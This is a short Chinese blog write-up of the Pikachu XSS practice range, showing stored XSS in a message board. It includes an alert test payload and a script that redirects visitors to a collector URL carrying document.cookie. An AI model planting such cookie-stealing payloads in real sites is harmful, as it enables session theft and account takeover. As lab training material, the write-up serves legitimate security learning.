pikachu靶场-XSS跨站脚本-存储型xss – 作者:知非知非知非

1626242726_60ee7ea65cc86a9cf70ad.png!small

管他呢?!!!先用BURP抓个包再说!!!

1626242733_60ee7eade53520e76d06b.png!small

HTTP方法是POST,传递信息在DATA!!!

这块,我去看大佬写的东西,看到了一个这样的典型案例!!

TIPS:有人的qq号被盗号之后在好友的空间里进行恶意留言,点进去就容易丢失某些信息。(存储型XSS)

小知识:存储型xss,一般出现在留言板或评论区等位置,提交的信息会保存到被攻击系统上,所以存储型xss又被称为持久性XSS,他所造成的威胁将更大!!!

经查看,源代码:

如果这里我在留言栏中增加:一条JS代码:实现上是会执行的!!!

<script>alert(1)</script>

1626242753_60ee7ec1c5f4571005ef6.png!small

1626242765_60ee7ecd18aa9a1dae513.png!small

而且,由于该代码是保存在系统内部的,所以没次刷新界面时,都会弹出此代码。

这里,我们引申,如果该代码是盗取用户COOKIE的代码呢?

每次用户查看此界面,用户的COOKIE信息都会被盗取,并发送到指定攻击者的IP地址上。

经查看源代码:留言提交的JS代码,已经嵌入代码执行

1626242776_60ee7ed8494438972575b.png!small

那个,如果我们用这个PAYLOAD提交,会发生什么呢?

<script>location.href=”http://localhost/pikachu/pkxss/xcookie/cookie.php?cookie=”+document.cookie</script>

1626242788_60ee7ee470e32877c6b01.png!small

查看源代码:

1626242797_60ee7eed6d9a3d5570000.png!small

1626242804_60ee7ef44b93e67a41933.png!small

来源:freebuf.com 2021-07-14 14:10:00 by: 知非知非知非

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享